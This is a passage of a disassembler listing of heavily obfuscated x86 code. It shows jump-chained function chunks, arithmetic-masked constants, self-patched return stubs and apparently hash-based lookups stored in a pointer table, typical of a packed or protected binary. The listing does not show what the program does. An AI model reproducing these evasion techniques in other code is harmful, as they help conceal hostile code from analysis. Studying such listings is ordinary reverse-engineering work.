; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_455FDA:				; CODE XREF: sub_4465A6:loc_453108j
		push	edx
		push	edi
		push	1A38BDC7h
		pop	edi
		rol	edi, 13h
		add	edi, 120B3F47h
		jmp	loc_43C181
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439549

loc_455FF0:				; CODE XREF: sub_439549+14j
		jz	loc_4590FC
		jmp	loc_439181
; END OF FUNCTION CHUNK	FOR sub_439549
; ---------------------------------------------------------------------------

loc_455FFB:				; CODE XREF: hvvrg7ie:0043E67Dj
		jle	loc_44B07C
		jl	loc_43E97F
		xchg	ebp, edi
		pushf

loc_45600A:				; CODE XREF: hvvrg7ie:00450171j
		xor	ebx, 70ABA693h
		add	ebx, ebp
		add	ebx, 74EDEA10h
		mov	[ebx], eax
		jmp	loc_43A753
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44543A

loc_45601F:				; CODE XREF: hvvrg7ie:004447EBj
					; sub_44543A+FDE5j
		sub	eax, 7C29011h
		xor	eax, 0FB7ECC35h
		add	eax, ebp
		add	eax, 71299DADh
		mov	eax, [eax]
		push	eax
		push	28h
		mov	eax, [ebp-4]
		jmp	loc_455D14
; END OF FUNCTION CHUNK	FOR sub_44543A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A319

loc_456040:				; CODE XREF: sub_43A319:loc_4562F9j
					; hvvrg7ie:00456309j
		xor	ebx, 0A0B65D76h
		and	ebx, 5867ED62h
		add	ebx, 0F821B2F8h
		popf
		xchg	ebx, [esp+4+var_4]
		jmp	loc_439BCD
; END OF FUNCTION CHUNK	FOR sub_43A319
; ---------------------------------------------------------------------------

loc_45605B:				; CODE XREF: hvvrg7ie:0045A071j
		xor	edi, 0DF60B4D2h
		sub	edi, 0C8BE3B79h
		rol	edi, 3
		jnb	loc_449F77
; START	OF FUNCTION CHUNK FOR sub_44F548

loc_456070:				; CODE XREF: sub_44F548+Bj
		jmp	nullsub_229
; END OF FUNCTION CHUNK	FOR sub_44F548
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_456075:				; CODE XREF: sub_450434-B2C5j
		jmp	loc_44A6AA
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
		ror	ecx, 7
		adc	ecx, esi
		sub	ecx, 0C9C73569h
		not	ebx
		jmp	loc_45958C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453E08

loc_45608C:				; CODE XREF: sub_453E08:loc_4429C9j
		cmp	ds:dword_43D6F4, 0
		jnz	loc_440F66
		jmp	loc_45B1D1
; END OF FUNCTION CHUNK	FOR sub_453E08
; ---------------------------------------------------------------------------

loc_45609E:				; CODE XREF: hvvrg7ie:loc_454797j
		jz	loc_44C689
; START	OF FUNCTION CHUNK FOR sub_44290B

loc_4560A4:				; CODE XREF: sub_44290B+FDECj
		jmp	loc_43FA45
; END OF FUNCTION CHUNK	FOR sub_44290B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_4560A9:				; CODE XREF: sub_450AA8+11D4j
		jmp	loc_44AF5F
; END OF FUNCTION CHUNK	FOR sub_450AA8
; ---------------------------------------------------------------------------

loc_4560AE:				; CODE XREF: hvvrg7ie:00449406j
		jmp	loc_44D428
; ---------------------------------------------------------------------------
		mov	ecx, [edx]
		sub	ecx, esi
		jo	loc_43ED54
		sub	eax, ebx
		xor	ebx, eax
		jmp	loc_44C689
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4418F0

loc_4560C6:				; CODE XREF: sub_449425:loc_43BAB0j
					; sub_443086+6j ...
		jmp	loc_442575
; ---------------------------------------------------------------------------

loc_4560CB:				; CODE XREF: sub_4418F0+7j
					; sub_449425-67E8j
		xchg	eax, [esp-4+arg_0]
		mov	ecx, eax
		pop	eax
		jmp	loc_44F7C3
; END OF FUNCTION CHUNK	FOR sub_4418F0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_4560D6:				; CODE XREF: sub_43B6A5:loc_4549A6j
					; hvvrg7ie:004549B4j
		add	eax, 0C2360295h
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_440BD7
		jmp	loc_44E18B
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
		cdq
		jmp	sub_44C5D0
; ---------------------------------------------------------------------------
		adc	edx, 4243B23Fh
		jmp	sub_44B4CA
; ---------------------------------------------------------------------------
		jge	loc_43E823
		jmp	sub_44128B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_456107:				; CODE XREF: sub_450246-BD00j
		rol	ecx, 0Ch
		add	ecx, 819FC5E3h
		xchg	ecx, [esp+0]
		jmp	loc_44D971
; END OF FUNCTION CHUNK	FOR sub_450246

; =============== S U B	R O U T	I N E =======================================



sub_456118	proc near		; CODE XREF: hvvrg7ie:0043B32Ej
					; sub_454099:loc_456DFAp

; FUNCTION CHUNK AT 0043AEBB SIZE 00000009 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	0
		push	0
		jmp	loc_43AEBB
sub_456118	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403B6

loc_456125:				; CODE XREF: sub_4403B6-313Cj
		jnz	loc_43B556
		jmp	loc_44CD72
; END OF FUNCTION CHUNK	FOR sub_4403B6
; ---------------------------------------------------------------------------
		test	eax, eax
		jnz	loc_43E1EE
		jmp	loc_442862
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_45613D:				; CODE XREF: sub_451E6D:loc_445C93j
		pushf
		and	ecx, 6310F369h
		adc	edx, ebx
		jmp	loc_441536
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458591

loc_45614B:				; CODE XREF: sub_458591+Fj
		cmp	edi, 216F4D8Bh
		jmp	loc_4451DD
; END OF FUNCTION CHUNK	FOR sub_458591
; ---------------------------------------------------------------------------
		popf
		shl	esi, 1Bh
		jmp	sub_457705
; ---------------------------------------------------------------------------
		jge	loc_444392

loc_456165:				; CODE XREF: hvvrg7ie:004446DCj
		cmp	eax, ebp
		jmp	loc_440175
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AE37

loc_45616C:				; CODE XREF: sub_44AE37:loc_45995Fj
		sub	eax, 0CE5CEB3Ah
		xor	eax, 0AD5FB48Bh
		push	offset loc_44BF03
		jmp	nullsub_374
; END OF FUNCTION CHUNK	FOR sub_44AE37
; ---------------------------------------------------------------------------
		mov	ds:dword_41D010, eax
		lea	eax, nullsub_21
		mov	byte ptr [eax],	0C3h
		jmp	loc_45A8BD
; ---------------------------------------------------------------------------

loc_456196:				; CODE XREF: hvvrg7ie:0043EE84j
		mov	eax, [esp]
		push	edx
		call	sub_44CB64
		push	49BA80Fh
		pop	eax
		jmp	loc_453201
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D5FD

loc_4561AA:				; CODE XREF: sub_43D5FD+EE16j
		rol	eax, 10h
		add	eax, 0D26B040h
		rol	eax, 1Fh
		jnb	loc_440376

loc_4561BC:				; CODE XREF: sub_44616F+1B1Cj
		jmp	loc_440B24
; END OF FUNCTION CHUNK	FOR sub_43D5FD
; ---------------------------------------------------------------------------
		or	eax, ebx
		jmp	loc_447759

; =============== S U B	R O U T	I N E =======================================



sub_4561C8	proc near		; CODE XREF: hvvrg7ie:0043B13Fj
					; sub_44AFA2+1p
		xchg	eax, [esp+0]
		pop	eax
		mov	ebp, esp
		call	sub_45488E

loc_4561D3:				; CODE XREF: sub_455DCC-9934j
		jmp	nullsub_231
sub_4561C8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44321C

loc_4561D8:				; CODE XREF: sub_44321C+Cj
		jmp	nullsub_444
; END OF FUNCTION CHUNK	FOR sub_44321C
; ---------------------------------------------------------------------------
		xchg	ecx, [edx]
		jmp	sub_440881
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518BD

loc_4561E4:				; CODE XREF: sub_4518BD:loc_455D1Ej
		or	eax, 0AEAEB4Bh
		add	eax, ds:4000F6h
		cmp	eax, 27BB89CDh
		jmp	loc_440A1A
; END OF FUNCTION CHUNK	FOR sub_4518BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458706

loc_4561FB:				; CODE XREF: sub_43931C:loc_4413C1j
					; hvvrg7ie:00449D98j ...
		xchg	esi, [esp+4+var_4]
		jmp	sub_453E08
; END OF FUNCTION CHUNK	FOR sub_458706
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459593

loc_456204:				; CODE XREF: sub_459593+Dj
		jmp	sub_458E44
; END OF FUNCTION CHUNK	FOR sub_459593

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_456209	proc near		; CODE XREF: sub_44352A+4j
		push	ebp
		mov	ebp, esp
		push	esi
		mov	esi, ecx
		jmp	loc_4503AD
sub_456209	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4527A1

loc_456214:				; CODE XREF: sub_4527A1-110B9j
		mov	edx, eax
		xchg	edx, [esp+0Ch+var_C]
		jmp	loc_44A014
; END OF FUNCTION CHUNK	FOR sub_4527A1
; ---------------------------------------------------------------------------

loc_45621E:				; CODE XREF: hvvrg7ie:0043A988j
		mov	edx, ds:dword_43CE04
		or	edx, edx
		jnz	loc_43CDEE
		jmp	loc_43CE93
; ---------------------------------------------------------------------------

loc_456231:				; CODE XREF: hvvrg7ie:004456A4j
		push	2C3E7E60h

loc_456236:				; CODE XREF: hvvrg7ie:loc_445690j
		add	esi, 4C10CC27h
		call	sub_44350E

loc_456241:				; CODE XREF: hvvrg7ie:loc_4396A9j
					; hvvrg7ie:loc_448A57j
		jnz	loc_45705F
		jmp	loc_44E4E4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_413. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45624D:				; CODE XREF: hvvrg7ie:0045A2C9j
		jmp	sub_43F98C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449007

loc_456252:				; CODE XREF: sub_449007+9j
		jmp	loc_4476BE
; END OF FUNCTION CHUNK	FOR sub_449007
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_456257:				; CODE XREF: sub_444BE1-5386j
		jmp	loc_441A63
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------
		test	eax, eax
		jz	loc_447CE9
		jmp	loc_43ABBF
; ---------------------------------------------------------------------------

loc_456269:				; CODE XREF: hvvrg7ie:loc_457E98j
					; hvvrg7ie:loc_45B61Dj
		add	edx, 0B10C5576h
		xchg	edx, [esp]
		jmp	nullsub_510
; ---------------------------------------------------------------------------
		jmp	ds:dword_41D0E0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_510. PRESS KEYPAD	"+" TO EXPAND]
		dw 0F284h
		dd 5AFFFE96h, 5224048Bh, 3420E951h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454463

loc_45628E:				; CODE XREF: sub_454463:loc_44B69Aj
		mov	esp, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_454463
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F6DB

loc_456292:				; CODE XREF: sub_454463-18F70j
					; sub_43F6DB+3j
		mov	eax, [ebp-4]
		mov	al, [eax]
		jmp	loc_44B60F
; END OF FUNCTION CHUNK	FOR sub_43F6DB
; ---------------------------------------------------------------------------

loc_45629C:				; CODE XREF: hvvrg7ie:00459B6Cj
		mov	[edi], eax
		push	ecx
		mov	edx, 128B027h
		jmp	loc_4538BB
; ---------------------------------------------------------------------------
		not	ecx
		jmp	sub_449C58

; =============== S U B	R O U T	I N E =======================================



sub_4562B0	proc near		; CODE XREF: sub_445FE6:loc_444267j

; FUNCTION CHUNK AT 004479E0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450DEE SIZE 0000000B BYTES

		add	esp, 0FFFFFFF4h
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		mov	[ebp-8], eax
		mov	eax, [ebp+8]
		jmp	loc_450DEE
sub_4562B0	endp

; ---------------------------------------------------------------------------
		shl	ecx, 4
		jmp	loc_44B3CA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_74. PRESS	KEYPAD "+" TO EXPAND]
		db 8Ch,	52h, 0C4h
dword_4562D0	dd 0			; DATA XREF: sub_4496DF+4w
dword_4562D4	dd 71250535h, 6363C8h	; DATA XREF: sub_44ADA5:loc_43C201o
					; sub_455B7D-6EE7o

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4562DC	proc near		; CODE XREF: hvvrg7ie:0043C911p
					; sub_450E01-E7D7p ...
		push	ebp
		mov	ebp, esp
		push	esi
		mov	esi, ecx
		jmp	loc_44CE18
sub_4562DC	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_4562E7:				; CODE XREF: sub_440C05+4063j
		cmp	edi, 62361BE4h
		jmp	loc_43BAD1
; END OF FUNCTION CHUNK	FOR sub_440C05
; ---------------------------------------------------------------------------
		mov	[eax], edi
		jmp	sub_4504E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A319

loc_4562F9:				; CODE XREF: sub_43A319+Ej
		js	loc_456040
; END OF FUNCTION CHUNK	FOR sub_43A319
; START	OF FUNCTION CHUNK FOR sub_449425

loc_4562FF:				; CODE XREF: sub_449425-2C1Ej
		jmp	nullsub_236
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------
		rol	edx, 19h
		mov	edi, [edx]
		jmp	loc_456040
; ---------------------------------------------------------------------------

loc_45630E:				; CODE XREF: hvvrg7ie:0045A9F6j
		sub	edx, ecx
		shl	ebx, 18h
		shr	ebx, 8
		xor	edx, 0C8EB91C7h
		shr	eax, 1Ch
		jmp	loc_43F86D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DB4C

loc_456324:				; CODE XREF: hvvrg7ie:loc_44BAB5j
					; sub_43DB4C+FB3Bj
		call	nullsub_316
		retn
; END OF FUNCTION CHUNK	FOR sub_43DB4C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_316. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45632B:				; CODE XREF: hvvrg7ie:0044BC23j
		jmp	loc_44212F
; ---------------------------------------------------------------------------

loc_456330:				; CODE XREF: hvvrg7ie:0043F97Aj
		jmp	loc_443CE8

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_456335	proc near		; CODE XREF: sub_44BEBB:loc_43A22Dp
					; hvvrg7ie:loc_4408D3p
		push	edx
		mov	edx, ebp
		xchg	edx, [esp+0]
		mov	ebp, esp
		jns	sub_4471E7
		jmp	loc_457C87
sub_456335	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_318. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_456349:				; CODE XREF: sub_445CCD-1802j
		jmp	loc_440A94
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------

loc_45634E:				; CODE XREF: hvvrg7ie:loc_43F16Cj
		mov	eax, 5BE2C7B9h
		push	edx
		push	0FCA42789h
		pop	edx
		rol	edx, 1Ah
		push	offset loc_44556A
		jmp	loc_44E82E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_193. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C2EA

loc_456368:				; CODE XREF: sub_44C2EA:loc_4399DBj
		push	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_44C2EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_45636A:				; CODE XREF: sub_43A839+262Aj
		push	offset sub_44AFA2
		jmp	loc_44887C
; END OF FUNCTION CHUNK	FOR sub_43A839
; ---------------------------------------------------------------------------

loc_456374:				; CODE XREF: hvvrg7ie:0044077Fj
		call	sub_4466CE
; START	OF FUNCTION CHUNK FOR sub_44BF37

loc_456379:				; CODE XREF: sub_44BF37+1Cj
		jmp	loc_44DDD7
; END OF FUNCTION CHUNK	FOR sub_44BF37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_45637E:				; CODE XREF: sub_43B6A5+1E86Dj
		mov	esi, 0F35AA13Eh
		add	ebx, eax

loc_456385:				; CODE XREF: sub_43B6A5+1E863j
		and	edx, 0A25BF01Eh
		or	edx, 4078329h
		xor	edx, 0DE04ED82h
		jmp	loc_43ACBD
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_45639C:				; CODE XREF: sub_43F227:loc_45217Ej
		jz	loc_43EE58
		jmp	loc_452105
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458082

loc_4563A7:				; CODE XREF: sub_458082:loc_458B5Fj
		call	sub_43E7F3
		retn
; END OF FUNCTION CHUNK	FOR sub_458082
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BA4

loc_4563AD:				; CODE XREF: sub_453BA4-939Ej
		jmp	sub_456DE7
; END OF FUNCTION CHUNK	FOR sub_453BA4
; ---------------------------------------------------------------------------

loc_4563B2:				; CODE XREF: hvvrg7ie:00442AF7j
		jmp	loc_4549CC
; ---------------------------------------------------------------------------
		db 9
dword_4563B8	dd 0			; DATA XREF: sub_43C0DE:loc_439F6Ar
					; sub_43C0DE+6r
; ---------------------------------------------------------------------------
		call	nullsub_21
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_4563C1:				; CODE XREF: sub_44E3B3:loc_457CD3j
		jmp	ds:dword_41D010
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_4563C7:				; CODE XREF: sub_448BC0+12A17j
		jmp	loc_43923D
; END OF FUNCTION CHUNK	FOR sub_448BC0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_21. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		add	al, 24h
		mov	edx, eax
		jmp	loc_43EE83
; ---------------------------------------------------------------------------

loc_4563D6:				; CODE XREF: hvvrg7ie:0043D13Bj
		jb	loc_43A5B7

; =============== S U B	R O U T	I N E =======================================



sub_4563DC	proc near		; CODE XREF: hvvrg7ie:0045121Cp

; FUNCTION CHUNK AT 004397D8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B7F6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EF7C SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043F504 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454A9B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458945 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B3BE SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		cmp	eax, [ebp-8]
		jnz	loc_454A9B
		jmp	loc_45B3BE
sub_4563DC	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_134. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		sbb	eax, ebp
		jmp	sub_439717
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4595B2

loc_4563F6:				; CODE XREF: sub_4595B2+7j
		add	eax, 982B946h
; END OF FUNCTION CHUNK	FOR sub_4595B2
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_4563FC:				; CODE XREF: sub_43E128:loc_44BD68j
		rol	eax, 2
		sub	eax, 0CDB244FDh
		xor	eax, 3E5CC923h
		jmp	loc_45389D
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455087

loc_456410:				; CODE XREF: sub_455087:loc_457FD7j
		pushf
		test	edi, 0E28AF4F0h
		jmp	loc_43B686
; END OF FUNCTION CHUNK	FOR sub_455087
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_101. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_45641D:				; CODE XREF: sub_43D285+E4CBj
		jmp	loc_44A521
; END OF FUNCTION CHUNK	FOR sub_43D285
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_512. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_456423	proc near		; CODE XREF: sub_454D23-1A099j
					; sub_43C491+7p ...

; FUNCTION CHUNK AT 0043D003 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043E6DB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004531E6 SIZE 0000001A BYTES

		js	sub_43D285
		push	ebp
		jmp	loc_4531E6
sub_456423	endp


; =============== S U B	R O U T	I N E =======================================



sub_45642F	proc near		; CODE XREF: hvvrg7ie:00445F1Fj
					; sub_45061E:loc_44A904p

arg_0		= dword	ptr  4

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	edi, [esp-4+arg_0]
		jmp	sub_446A16
sub_45642F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAC8

loc_45643B:				; CODE XREF: sub_45AAC8-AEBBj
		adc	ebp, eax
		ror	ebp, 0Ch

loc_456440:				; CODE XREF: sub_45AAC8:loc_44DAAEj
		mov	eax, 0DD960900h
		call	sub_455CD4
; END OF FUNCTION CHUNK	FOR sub_45AAC8
; START	OF FUNCTION CHUNK FOR sub_445F2A

loc_45644A:				; CODE XREF: sub_445F2A+17j
		jmp	loc_444B0F
; END OF FUNCTION CHUNK	FOR sub_445F2A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446297

loc_45644F:				; CODE XREF: sub_446297-C4E1j
		jmp	loc_4550ED
; END OF FUNCTION CHUNK	FOR sub_446297
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452F3F

loc_456454:				; CODE XREF: sub_452F3F:loc_447E16j
		add	eax, ebp
		add	eax, 5C93BEA2h
		mov	eax, [eax]
		push	eax
		jmp	loc_450405
; END OF FUNCTION CHUNK	FOR sub_452F3F
; ---------------------------------------------------------------------------
		dd 879C8A0Fh, 8C0FFFFFh, 54B2h,	0FE839EE9h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F43

loc_456475:				; CODE XREF: sub_458F43+Bj
		mov	eax, cs
		xor	al, al
		or	eax, eax
		jnz	loc_439973
		jmp	loc_44CB75
; END OF FUNCTION CHUNK	FOR sub_458F43
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44646D

loc_456486:				; CODE XREF: sub_44646D+Dj
		cmp	al, 0A4h
		jz	loc_45566A
		jmp	loc_440E06
; END OF FUNCTION CHUNK	FOR sub_44646D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452F0E

loc_456493:				; CODE XREF: sub_452F0E:loc_44E714j
		push	offset loc_455B40
		jmp	nullsub_349
; END OF FUNCTION CHUNK	FOR sub_452F0E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_45649D:				; CODE XREF: sub_450246+7AFDj
		jge	loc_44AF03
		or	ecx, 6CDF7122h
		sub	ecx, 0A33BA63Ch
		sbb	ebp, 0C765A6BBh
		jmp	loc_441477
; ---------------------------------------------------------------------------

loc_4564BA:				; CODE XREF: sub_450246:loc_449B3Cj
					; sub_450246-4C53j
		mov	eax, [ebp-20h]
		jmp	loc_447182
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_4564C2:				; CODE XREF: sub_44388C:loc_43D193j
		jnz	loc_45A5DD

loc_4564C8:				; CODE XREF: sub_449517+12j
		jmp	loc_44D6E4
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_4564CD:				; CODE XREF: sub_44E533-1086Cj
					; sub_44D2F8:loc_4410F0j
		jmp	nullsub_287
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------

loc_4564D2:				; CODE XREF: hvvrg7ie:0043AA28j
		jmp	loc_4568AB
; ---------------------------------------------------------------------------
		xchg	ebx, esi
		jl	loc_44B20B
		sub	ebx, 482932DEh
		jmp	loc_45A5D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_4564EA:				; CODE XREF: sub_4465A6+975j
		add	eax, 0E9412B50h
		add	eax, ebp
		add	eax, 0D62DCBACh
		mov	eax, [eax]
; END OF FUNCTION CHUNK	FOR sub_4465A6
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_4564FA:				; CODE XREF: sub_45038B-A32Fj
		jmp	loc_44EAF8
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F50

loc_4564FF:				; CODE XREF: sub_457F50:loc_43C4CBj
		jmp	ds:dword_41D128
; END OF FUNCTION CHUNK	FOR sub_457F50
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_382. PRESS KEYPAD	"+" TO EXPAND]
		align 4
		dd 87000037h, 0D78B243Ch, 3FC8E9h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44398A

loc_456515:				; CODE XREF: sub_44398A:loc_444B0Aj
		xchg	edx, [eax]
		add	eax, ebx
		jmp	loc_45AC39
; END OF FUNCTION CHUNK	FOR sub_44398A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446284

loc_45651E:				; CODE XREF: sub_446284+Ej
		pop	ebp
		pop	ebp
		jmp	loc_439626
; END OF FUNCTION CHUNK	FOR sub_446284
; ---------------------------------------------------------------------------

loc_456525:				; CODE XREF: hvvrg7ie:loc_44454Bj
		push	offset sub_45ACF1
		jmp	loc_445B52
; ---------------------------------------------------------------------------

loc_45652F:				; CODE XREF: hvvrg7ie:0044F26Fj
		xor	esi, 0FE171E4Bh

; =============== S U B	R O U T	I N E =======================================



sub_456535	proc near		; CODE XREF: sub_453EFC+4DA2p
		xchg	ebx, [esp+0]
		pop	ebx
		or	edx, edx
		jnz	loc_4496E9
		jmp	loc_4587D1
sub_456535	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_456546:				; CODE XREF: hvvrg7ie:loc_43F0D7j
		pushf
		push	7127020Fh
		pop	esi
		sub	esi, 4DB14039h
		and	esi, 284862C5h
		rol	esi, 5
		xor	esi, 69CD966Ch
		add	esi, 9E7F9EE5h
		jmp	loc_452D3A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FD2B

loc_45656D:				; CODE XREF: sub_43FD2B:loc_44528Dj
		push	0

loc_45656F:				; CODE XREF: hvvrg7ie:loc_440B3Aj
		push	0EC9B801Ah
		pop	eax
		add	eax, 4F64A0B3h
		xor	eax, 2CB4D262h
		jns	loc_45A7AB

loc_456587:				; CODE XREF: sub_452EAF+5j
		jmp	nullsub_244
; END OF FUNCTION CHUNK	FOR sub_43FD2B
; ---------------------------------------------------------------------------
		mov	ebx, [edi]
		jmp	loc_43CBF5
; ---------------------------------------------------------------------------

loc_456593:				; DATA XREF: sub_44E6B4:loc_44A9F9o
		xor	edi, 0A41A88DDh
		add	edi, ebp
		add	edi, 3A5A98A2h
		mov	[edi], eax
		pop	edi
		jmp	loc_454025
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4571C8

loc_4565A9:				; CODE XREF: sub_4571C8:loc_4571CDj
		mov	eax, 0DD1C4F2h
		call	sub_450C5A
		mov	ds:dword_41D164, eax
		lea	eax, nullsub_26
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_26
; END OF FUNCTION CHUNK	FOR sub_4571C8
; ---------------------------------------------------------------------------
		call	nullsub_17
		jmp	ds:dword_41D168
; ---------------------------------------------------------------------------

loc_4565D2:				; CODE XREF: hvvrg7ie:loc_453206j
		pop	ecx
		pop	eax
		pop	edx
		xchg	ecx, [esp]
		mov	ebp, ecx
		jmp	loc_44ED3A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D5FD

loc_4565DF:				; CODE XREF: sub_4521D4-6D55j
					; sub_43D5FD:loc_45B256j
		call	sub_44DE0A
		push	0A9485FD7h
		xchg	ecx, [esp+4+var_4]
		mov	edx, ecx
		pop	ecx
		jmp	loc_4422F2
; END OF FUNCTION CHUNK	FOR sub_43D5FD
; ---------------------------------------------------------------------------

loc_4565F4:				; CODE XREF: hvvrg7ie:0043CB05j
		jnz	loc_443198
; START	OF FUNCTION CHUNK FOR sub_44CA9C

